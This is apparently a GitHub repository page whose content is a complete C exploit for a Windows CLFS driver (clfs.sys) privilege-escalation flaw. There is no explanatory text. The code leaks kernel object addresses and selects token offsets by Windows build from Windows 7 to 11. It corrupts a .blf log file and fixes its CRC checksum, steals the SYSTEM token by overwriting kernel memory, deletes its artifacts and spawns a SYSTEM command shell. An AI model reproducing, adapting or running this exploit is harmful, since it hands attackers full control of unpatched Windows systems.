README.md
Rendering markdown...
#include <Windows.h>
#include <clfsw32.h>
#pragma comment(lib, "clfsw32.lib")
#include <strsafe.h>
#include <tchar.h>
#include <time.h>
//#define CMD L"C:\\windows\\system32\\cmd.exe"
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004
typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;
#define MAX_LOG_MESSAGE 1024
#define MAXIMUM_FILENAME_LENGTH 255
#define CMD L"C:\\windows\\system32\\cmd.exe"
BOOL LogMessage(LEVEL Level, LPCTSTR Format, ...)
{
TCHAR Buffer[MAX_LOG_MESSAGE] = { 0 };
va_list Args;
va_start(Args, Format);
StringCchVPrintf(Buffer, MAX_LOG_MESSAGE, Format, Args);
va_end(Args);
switch (Level) {
case L_DEBUG: _ftprintf(stdout, TEXT("[?] %s\n"), Buffer); break;
case L_INFO: _ftprintf(stdout, TEXT("[+] %s\n"), Buffer); break;
case L_WARN: _ftprintf(stderr, TEXT("[*] %s\n"), Buffer); break;
case L_ERROR: _ftprintf(stderr, TEXT("[!] %s\n"), Buffer); break;
}
fflush(stdout);
fflush(stderr);
return TRUE;
}
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsLegacyProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN SpareBits : 3;
};
};
HANDLE Mutant;
PVOID ImageBaseAddress;
PVOID Ldr;
PVOID ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
PVOID AtlThunkSListPtr;
PVOID IFEOKey;
union
{
ULONG CrossProcessFlags;
struct
{
ULONG ProcessInJob : 1;
ULONG ProcessInitializing : 1;
ULONG ProcessUsingVEH : 1;
ULONG ProcessUsingVCH : 1;
ULONG ProcessUsingFTH : 1;
ULONG ReservedBits0 : 27;
};
ULONG EnvironmentUpdateCount;
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
ULONG SystemReserved[1];
ULONG AtlThunkSListPtr32;
PVOID ApiSetMap;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[2];
PVOID ReadOnlySharedMemoryBase;
PVOID HotpatchInformation;
PVOID *ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
ULONG NtGlobalFlag;
LARGE_INTEGER CriticalSectionTimeout;
SIZE_T HeapSegmentReserve;
SIZE_T HeapSegmentCommit;
SIZE_T HeapDeCommitTotalFreeThreshold;
SIZE_T HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID *ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
UINT GdiDCAttributeList;
struct _RTL_CRITICAL_SECTION *LoaderLock;
UINT OSMajorVersion;
UINT OSMinorVersion;
UINT16 OSBuildNumber;
UINT16 OSCSDVersion;
UINT OSPlatformId;
UINT ImageSubsystem;
UINT ImageSubsystemMajorVersion;
UINT ImageSubsystemMinorVersion;
UINT64 ActiveProcessAffinityMask;
UINT GdiHandleBuffer[60];
PVOID PostProcessInitRoutine;
PVOID TlsExpansionBitmap;
UINT TlsExpansionBitmapBits[32];
UINT SessionId;
union _ULARGE_INTEGER AppCompatFlags;
union _ULARGE_INTEGER AppCompatFlagsUser;
PVOID pShimData;
PVOID AppCompatInfo;
} PEB, *PPEB;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
SystemTimeOfDayInformation = 3,
SystemProcessInformation = 5,
SystemProcessorPerformanceInformation = 8,
SystemModuleInformation = 11,
SystemHandleInformation = 16,
SystemObjectInformation = 17,
SystemInterruptInformation = 23,
SystemExceptionInformation = 33,
SystemRegistryQuotaInformation = 37,
SystemLookasideInformation = 45,
SystemExtendedHandleInformation = 64
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS(NTAPI *NtQueryInformationProcess_t)(
HANDLE ProcessHandle,
DWORD ProcessInformationClass,
PVOID ProcessInformation,
DWORD ProcessInformationLength,
PDWORD ReturnLength
);
typedef NTSTATUS(WINAPI *NtQuerySystemInformation_t)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS(WINAPI *NtWriteVirtualMemory_t)(
HANDLE ProcessHandle,
PVOID BaseAddress,
PVOID Buffer,
ULONG NumberOfBytesToWrite,
PULONG NumberOfBytesWritten);
typedef struct _StructNew
{
PEB *pPEB;
NtQuerySystemInformation_t pNtQuerySystemInformation;
NtWriteVirtualMemory_t pNtWriteVirtualMemory;
PVOID hProcessHandle;
PVOID hThreadHandle;
ULONGLONG KeProcessObj;
ULONGLONG KeThreadObj;
ULONGLONG PreviousModeOff;
}StructNew, *PStructNew;
typedef struct _TEB {
NT_TIB NtTib;
PVOID EnvironmentPointer;
struct {
HANDLE UniqueProcess;
HANDLE UniqueThread;
} ClientId;
PVOID ActiveRpcHandle;
PVOID ThreadLocalStoragePointer;
PEB *ProcessEnvironmentBlock;
} TEB, *PTEB;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
PVOID Object;
ULONG_PTR UniqueProcessId;
HANDLE HandleValue;
ULONG GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_EXTENDED_HANDLE_INFORMATION { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; } SYSTEM_EXTENDED_HANDLE_INFORMATION, *PSYSTEM_EXTENDED_HANDLE_INFORMATION;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
ULONG ProcessId;
UCHAR ObjectTypeNumber;
UCHAR Flags;
USHORT Handle;
void* Object;
ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE Handels[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
typedef struct SYSTEM_MODULE {
ULONG Reserved1;
ULONG Reserved2;
#ifdef _WIN64
ULONG Reserved3;
#endif
PVOID ImageBaseAddress;
ULONG ImageSize;
ULONG Flags;
WORD Id;
WORD Rank;
WORD w018;
WORD NameOffset;
CHAR Name[MAXIMUM_FILENAME_LENGTH];
}SYSTEM_MODULE, *PSYSTEM_MODULE;
typedef struct SYSTEM_MODULE_INFORMATION {
ULONG ModulesCount;
SYSTEM_MODULE Modules[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
INT globalFlag = 0;
PStructNew pStructTemp = (PStructNew)VirtualAlloc(NULL, sizeof(StructNew), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
DWORD currentID = GetCurrentProcessId();
ULONGLONG AddressOfKeSysToken;
ULONGLONG AddressOfKeCuProcToken;
DWORD CRC32(BYTE* ptr, DWORD Size)
{
DWORD crcTable[256], crcTmp1;
for (int i = 0; i < 256; i++)
{
crcTmp1 = i;
for (int j = 8; j > 0; j--)
{
if (crcTmp1 & 1) crcTmp1 = (crcTmp1 >> 1) ^ 0xEDB88320L;
else crcTmp1 >>= 1;
}
crcTable[i] = crcTmp1;
}
DWORD crcTmp2 = 0xFFFFFFFF;
while (Size--)
{
crcTmp2 = ((crcTmp2 >> 8) & 0x00FFFFFF) ^ crcTable[(crcTmp2 ^ (*ptr)) & 0xFF];
ptr++;
}
return (crcTmp2 ^ 0xFFFFFFFF);
}
DWORD64 GetObjectAddressWithHandle(HANDLE hObjectHandle, UINT nMaxSearchTry)
{
NTSTATUS st;
PSYSTEM_EXTENDED_HANDLE_INFORMATION handleInfo;
ULONG handleInfoLen = 0x10000;
DWORD pid = GetCurrentProcessId();
DWORD64 ret = 0;
NtQuerySystemInformation_t NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL)
{
LogMessage(L_ERROR, TEXT("NtQuerySystemInformation get error!"));
exit(1);
}
for (UINT j = 0; j < nMaxSearchTry; j++)
{
handleInfoLen = 0x10000;
handleInfo = (PSYSTEM_EXTENDED_HANDLE_INFORMATION)malloc(handleInfoLen);
while ((st = NtQuerySystemInformation(
SystemExtendedHandleInformation,
handleInfo,
handleInfoLen,
NULL
)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_EXTENDED_HANDLE_INFORMATION)realloc(handleInfo, handleInfoLen *= 2);
// NtQuerySystemInformation stopped giving us STATUS_INFO_LENGTH_MISMATCH.
for (UINT i = 0; i < handleInfo->NumberOfHandles; i++)
{
if (handleInfo->Handles[i].HandleValue == hObjectHandle && pid == handleInfo->Handles[i].UniqueProcessId)
{
ret = ((DWORD64)(handleInfo->Handles[i].Object));
LogMessage(L_INFO, TEXT("get address successful!"));
free(handleInfo);
return ret;
}
}
free(handleInfo);
}
return 0;
}
DWORD64 GetObjectAddressWithProcessId(DWORD dwProcessId, UINT nMaxSearchTry)
{
NTSTATUS st;
PSYSTEM_EXTENDED_HANDLE_INFORMATION handleInfo;
ULONG handleInfoLen = 0x10000;
DWORD pid = GetCurrentProcessId();
DWORD64 ret = 0;
NtQuerySystemInformation_t NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL)
{
LogMessage(L_ERROR, TEXT("NtQuerySystemInformation get error!"));
exit(1);
}
for (UINT j = 0; j < nMaxSearchTry; j++)
{
handleInfoLen = 0x10000;
handleInfo = (PSYSTEM_EXTENDED_HANDLE_INFORMATION)malloc(handleInfoLen);
while ((st = NtQuerySystemInformation(
SystemExtendedHandleInformation,
handleInfo,
handleInfoLen,
NULL
)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_EXTENDED_HANDLE_INFORMATION)realloc(handleInfo, handleInfoLen *= 2);
// NtQuerySystemInformation stopped giving us STATUS_INFO_LENGTH_MISMATCH.
for (UINT i = 0; i < handleInfo->NumberOfHandles; i++)
{
if (dwProcessId == handleInfo->Handles[i].UniqueProcessId)
{
ret = ((DWORD64)(handleInfo->Handles[i].Object));
LogMessage(L_INFO, TEXT("get address successful!"));
free(handleInfo);
return ret;
}
}
free(handleInfo);
}
return 0;
}
HANDLE GetObjectHandleWithAddress(DWORD64 pAddress, UINT nMaxSearchTry)
{
NTSTATUS st;
PSYSTEM_EXTENDED_HANDLE_INFORMATION handleInfo;
ULONG handleInfoLen = 0x10000;
DWORD pid = GetCurrentProcessId();
HANDLE ret = INVALID_HANDLE_VALUE;
NtQuerySystemInformation_t NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL)
{
LogMessage(L_ERROR, TEXT("NtQuerySystemInformation get error!"));
exit(1);
}
for (UINT j = 0; j < nMaxSearchTry; j++)
{
handleInfoLen = 0x10000;
handleInfo = (PSYSTEM_EXTENDED_HANDLE_INFORMATION)malloc(handleInfoLen);
while ((st = NtQuerySystemInformation(
SystemExtendedHandleInformation,
handleInfo,
handleInfoLen,
NULL
)) == STATUS_INFO_LENGTH_MISMATCH)
handleInfo = (PSYSTEM_EXTENDED_HANDLE_INFORMATION)realloc(handleInfo, handleInfoLen *= 2);
for (UINT i = 0; i < handleInfo->NumberOfHandles; i++)
{
if ((DWORD64)(handleInfo->Handles[i].Object) == pAddress && pid == handleInfo->Handles[i].UniqueProcessId)
{
ret = handleInfo->Handles[i].HandleValue;
LogMessage(L_INFO, TEXT("get handle successful!"));
free(handleInfo);
return ret;
}
}
free(handleInfo);
}
return INVALID_HANDLE_VALUE;
}
INT InitStruct()
{
INT result = 0;
pStructTemp->pNtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation");
pStructTemp->pNtWriteVirtualMemory = (NtWriteVirtualMemory_t)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtWriteVirtualMemory");
PTEB pTEB = NtCurrentTeb();
pStructTemp->pPEB = pTEB->ProcessEnvironmentBlock;
INT v21, v19, v20;
if (!DuplicateHandle(GetCurrentProcess(), GetCurrentProcess(), GetCurrentProcess(), &pStructTemp->hProcessHandle, 0, 0, 2u))
{
LogMessage(L_ERROR, TEXT("Duplicate process Handle error"));
return 0;
}
if (!DuplicateHandle(GetCurrentProcess(), GetCurrentThread(), GetCurrentProcess(), &pStructTemp->hThreadHandle, 0, 0, 2u))
{
LogMessage(L_ERROR, TEXT("Duplicate thread Handle error"));
return 0;
}
pStructTemp->KeProcessObj = (ULONGLONG)GetObjectAddressWithHandle(pStructTemp->hProcessHandle, 1000);
pStructTemp->KeThreadObj = (ULONGLONG)GetObjectAddressWithHandle(pStructTemp->hThreadHandle, 1000);
UINT OSBuildNumber = pStructTemp->pPEB->OSBuildNumber;
if (OSBuildNumber > 18362)
{
if (OSBuildNumber > 19043)
{
if (OSBuildNumber == 19044 || OSBuildNumber == 20348)
goto LABEL_30;
v21 = OSBuildNumber == 22000;
}
else
{
if (OSBuildNumber == 19043)
goto LABEL_30;
v19 = OSBuildNumber - 18363;
if (!v19)
goto LABEL_25;
v20 = v19 - 678;
if (!v20)
goto LABEL_30;
v21 = v20 == 1;
}
if (!v21)
return 1;
LABEL_30:
globalFlag = 0x4B8;
pStructTemp->PreviousModeOff = 0x232;
return 1;
}
if (OSBuildNumber == 18362)
{
LABEL_25:
globalFlag = 0x360;
result = 1;
pStructTemp->PreviousModeOff = 0x232;
return result;
}
if (OSBuildNumber <= 15063)
{
switch (OSBuildNumber)
{
case 15063u:
LABEL_11:
globalFlag = 0x358;
result = 1;
pStructTemp->PreviousModeOff = 0x232;
return result;
case 7601u:
pStructTemp->PreviousModeOff = 0x1F6; // win7 sp1
result = 1;
globalFlag = 0x208;
return result;
case 9200u:
case 9600u:
globalFlag = 0x348;
result = 1;
pStructTemp->PreviousModeOff = 0x232;
return result;
case 14393u:
goto LABEL_11;
}
return 1;
}
if (OSBuildNumber == 16299)
{
pStructTemp->PreviousModeOff = 0x232;
}
else if (OSBuildNumber != 17134 && OSBuildNumber != 17763)
{
return 1;
}
globalFlag = 0x358;
result = 1;
pStructTemp->PreviousModeOff = 0x232;
return result;
}
INT leakReadWrite()
{
HANDLE hCurrentProc = OpenProcess(0x400, 0, currentID);
if (!hCurrentProc)
{
LogMessage(L_ERROR, TEXT("get proc handle error!"));
exit(1);
}
DWORD dwCurrentProcessID = GetCurrentProcessId();
HMODULE hmNtdll = GetModuleHandle(L"ntdll");
if (!hmNtdll)
{
LogMessage(L_ERROR, TEXT("get module handle error!"));
exit(1);
}
ULONGLONG ulKeCurrentPorc = (ULONGLONG)GetObjectAddressWithHandle(hCurrentProc, 1000);
ULONGLONG ulKeSystemPorc = (ULONGLONG)GetObjectAddressWithProcessId(4, 1000);
if (!ulKeCurrentPorc || !ulKeSystemPorc)
{
LogMessage(L_ERROR, TEXT("get ulKeCurrentPorc or ulKeSystemPorc error!"));
exit(1);
}
LogMessage(L_INFO, TEXT("ulKeCurrentPorc is 0x%p"), ulKeCurrentPorc);
LogMessage(L_INFO, TEXT("ulKeSystemPorc is 0x%p"), ulKeSystemPorc);
AddressOfKeSysToken = ulKeSystemPorc + globalFlag;
AddressOfKeCuProcToken = ulKeCurrentPorc + globalFlag;
LogMessage(L_INFO, TEXT("AddressOfKeSysToken is 0x%p"), AddressOfKeSysToken);
LogMessage(L_INFO, TEXT("AddressOfKeCuProcToken is 0x%p"), AddressOfKeCuProcToken);
return 0;
}
ULONGLONG getSystemModuleAddr(char *String2)
{
NtQuerySystemInformation_t NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
if (NtQuerySystemInformation == NULL)
{
LogMessage(L_ERROR, TEXT("NtQuerySystemInformation get error!"));
exit(1);
}
ULONG len = 0;
NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)malloc(len);
if (pModuleInfo == NULL) {
LogMessage(L_ERROR, TEXT("NtQuerySystemInformation get error!"));
exit(1);
}
NTSTATUS status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
if (status != (NTSTATUS)0x0) {
LogMessage(L_ERROR, TEXT("NtQuerySystemInformation get error!"));
exit(1);
}
PVOID kernelImageBase = NULL;
for (unsigned int i = 0; i < pModuleInfo->ModulesCount; i++) {
kernelImageBase = pModuleInfo->Modules[i].ImageBaseAddress;
PCHAR kernelImage = (PCHAR)pModuleInfo->Modules[i].Name;
if (!_stricmp(kernelImage, String2))
{
LogMessage(L_INFO, TEXT("kernelImageBase find, image kernelImageBase 0x%p!"), kernelImageBase);
return (ULONGLONG)kernelImageBase;
}
}
return 0;
}
void PopShell()
{
STARTUPINFO si = { sizeof(STARTUPINFO) };
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
CreateProcess(CMD, NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
}
int main()
{
WCHAR pwszContainerPath[768];
wsprintfW(pwszContainerPath, L"C:\\Users\\Public\\.container_%d", time(0));
WCHAR *pwCommand = L"cmd.exe";
PSYSTEM_HANDLE_INFORMATION pSystemHandleInfo = NULL;
PULONGLONG pClassClfs = NULL;
PULONGLONG pClassFive = NULL;
ULONGLONG KeAddressOfClfs;
if (!InitStruct())
{
LogMessage(L_ERROR, TEXT("init struct error!"));
return 0;
}
if (pStructTemp->KeProcessObj)
LogMessage(L_INFO, TEXT("PreviousModeOff is 0x%p"), pStructTemp->PreviousModeOff);
leakReadWrite();
HANDLE hCurrentProc = OpenProcess(0x400, 0, currentID);
if (!hCurrentProc)
{
LogMessage(L_ERROR, TEXT("get proc handle error!"));
exit(1);
}
HANDLE hToken = NULL;
if (!OpenProcessToken(hCurrentProc, 0x20, &hToken))
{
LogMessage(L_ERROR, TEXT("get OpenProcessToken handle error!"));
exit(1);
}
pClassClfs = (PULONGLONG)VirtualAlloc((LPVOID)0x40000000, 0x100000, 0x3000, 4);
if (!pClassClfs || (pClassFive =(PULONGLONG)VirtualAlloc((LPVOID)0x50000000, 0x100000, 0x3000, 4)) == 0)
{
LogMessage(L_ERROR, TEXT("VirtualAlloc error!"));
exit(0);
}
CHAR *chStrClfs = "\\SystemRoot\\system32\\drivers\\clfs.sys";
if (pStructTemp->pPEB->OSBuildNumber <= 7601u)
chStrClfs = "\\SystemRoot\\system32\\clfs.sys";
KeAddressOfClfs = getSystemModuleAddr(chStrClfs);
WCHAR *wchClfsPath = L"C:\\Windows\\System32\\drivers\\clfs.sys";
if (pStructTemp->pPEB->OSBuildNumber <= 7601u)
wchClfsPath = L"C:\\Windows\\System32\\clfs.sys";
HMODULE Library = LoadLibraryEx(wchClfsPath, 0, 1);
if (!Library)
{
LogMessage(L_ERROR, TEXT("LoadLibraryEx error!"));
return 0;
}
PVOID ClfsSetEndOfLog = GetProcAddress(Library, "ClfsSetEndOfLog");
ULONGLONG KeAddressOfClfsSetEndOfLog = (ULONGLONG)ClfsSetEndOfLog - (ULONGLONG)Library + KeAddressOfClfs;
FreeLibrary(Library);
LogMessage(L_INFO, TEXT("KeAddressOfClfsSetEndOfLog is 0x%p"), KeAddressOfClfsSetEndOfLog);
pClassClfs[0] = 0x50000000;
pClassClfs[6] = pStructTemp->KeThreadObj + 0x30 + pStructTemp->PreviousModeOff;
pClassFive[1] = KeAddressOfClfsSetEndOfLog;
pClassClfs[4] = (ULONGLONG)CreateFileW(L"C:\\Users\\Public\\a", 0x40000000, 0, 0, 1, 0x80, 0);
HANDLE LogFile = CreateLogFile(L"LOG:C:\\Users\\Public\\MyLog::Stream1", 0xC0000000, 1, 0, 4, 0);
if (LogFile == (HANDLE)-1)
{
LogMessage(L_ERROR, TEXT("CreateLogFile error!"));
exit(0);
}
ULONGLONG pcbContainer = 512;
DWORD NumberOfBytesWritten[2];
if (AddLogContainer(LogFile, &pcbContainer, pwszContainerPath, 0))
{
LogMessage(L_ERROR, TEXT("AddLogContainer error!"));
CloseHandle(LogFile);
UINT Buffer = 0x15A8;
INT v50 = 0x1520;
INT v51 = 0;
INT v52 = 0x1520;
ULONGLONG v55 = 0x40000000;
HANDLE v28 = CreateFileW(L"C:\\Users\\Public\\MyLog.blf", 0xC0000000, 7, 0, 3, 0x80, 0);
SetFilePointer(v28, 0x9784, 0, 1);
if (!WriteFile(v28, &v50, 4, NumberOfBytesWritten, 0))
{
LogMessage(L_ERROR, TEXT("write file error at 0x9784!"));
exit(1);
}
CloseHandle(v28);
HANDLE v29 = CreateFileW(L"C:\\Users\\Public\\MyLog.blf", 0xC0000000, 7, 0, 3, 0x80, 0);
SetFilePointer(v29, 0x9798, 0, 1);
if (!WriteFile(v29, &v51, 4, NumberOfBytesWritten, 0))
{
LogMessage(L_ERROR, TEXT("write file error at 0x9798!"));
exit(1);
}
CloseHandle(v29);
HANDLE v30 = CreateFileW(L"C:\\Users\\Public\\MyLog.blf", 0xC0000000, 7, 0, 3, 0x80, 0);
SetFilePointer(v30, 0x97B0, 0, 1);
if (!WriteFile(v30, &v55, 8, NumberOfBytesWritten, 0))
{
LogMessage(L_ERROR, TEXT("write file error at 0x97B0!"));
exit(1);
}
CloseHandle(v30);
HANDLE v31 = CreateFileW(L"C:\\Users\\Public\\MyLog.blf", 0xC0000000, 7, 0, 3, 0x80, 0);
SetFilePointer(v31, 0x83A8, 0, 1);
if (!WriteFile(v31, &v52, 4, NumberOfBytesWritten, 0))
{
LogMessage(L_ERROR, TEXT("write file error at 0x93A8!"));
exit(1);
}
CloseHandle(v31);
HANDLE v32 = CreateFileW(L"C:\\Users\\Public\\MyLog.blf", 0xC0000000, 7, 0, 3, 0x80, 0);
SetFilePointer(v32, 0x8200, 0, 1);
INT v33 = 31232;
PBYTE v34 = (PBYTE)malloc(0x7A00);
DWORD NumberOfBytesRead;
ReadFile(v32, v34, 0x7A00u, &NumberOfBytesRead, 0);
*(DWORD*)(v34 + 0xc) = 0;
UINT uCrc32 = CRC32(v34, 0x7a00);
printf("crc32: 0x%8x\n", uCrc32);
CloseHandle(v32);
free(v34);
HANDLE v38 = CreateFileW(L"C:\\Users\\Public\\MyLog.blf", 0xC0000000, 7u, 0, 3u, 0x80u, 0);
SetFilePointer(v38, 0x820C, 0, 1);
WriteFile(v38, &uCrc32, 4, &NumberOfBytesRead, 0);
CloseHandle(v38);
HANDLE v39 = CreateLogFile(L"LOG:C:\\Users\\Public\\MyLog::Stream1", 0xC0000000, 1u, 0, 4u, 0);
CloseHandle(v39);
ULONGLONG v40 = AddressOfKeSysToken;
HANDLE hCurrentProcess = GetCurrentProcess();
(NtWriteVirtualMemory_t)pStructTemp->pNtWriteVirtualMemory(
hCurrentProcess,
NumberOfBytesWritten,
(PVOID)v40,
8,
&NumberOfBytesRead);
ULONGLONG v42 = AddressOfKeCuProcToken;
(NtWriteVirtualMemory_t)pStructTemp->pNtWriteVirtualMemory(// replace token
hCurrentProcess,
(PVOID)v42,
NumberOfBytesWritten,
8,
&NumberOfBytesRead);
CHAR v47[4];
v47[0] = 1;
ULONGLONG v44 = pStructTemp->KeThreadObj + pStructTemp->PreviousModeOff;
(NtWriteVirtualMemory_t)pStructTemp->pNtWriteVirtualMemory(
hCurrentProcess,
(PVOID)v44,
v47,
1,
NumberOfBytesWritten);
DeleteFileW(L"C:\\Users\\Public\\a");
DeleteFileW(L"C:\\Users\\Public\\MyLog.blf");
if (currentID == GetCurrentProcessId())
PopShell();
}
return 0;
}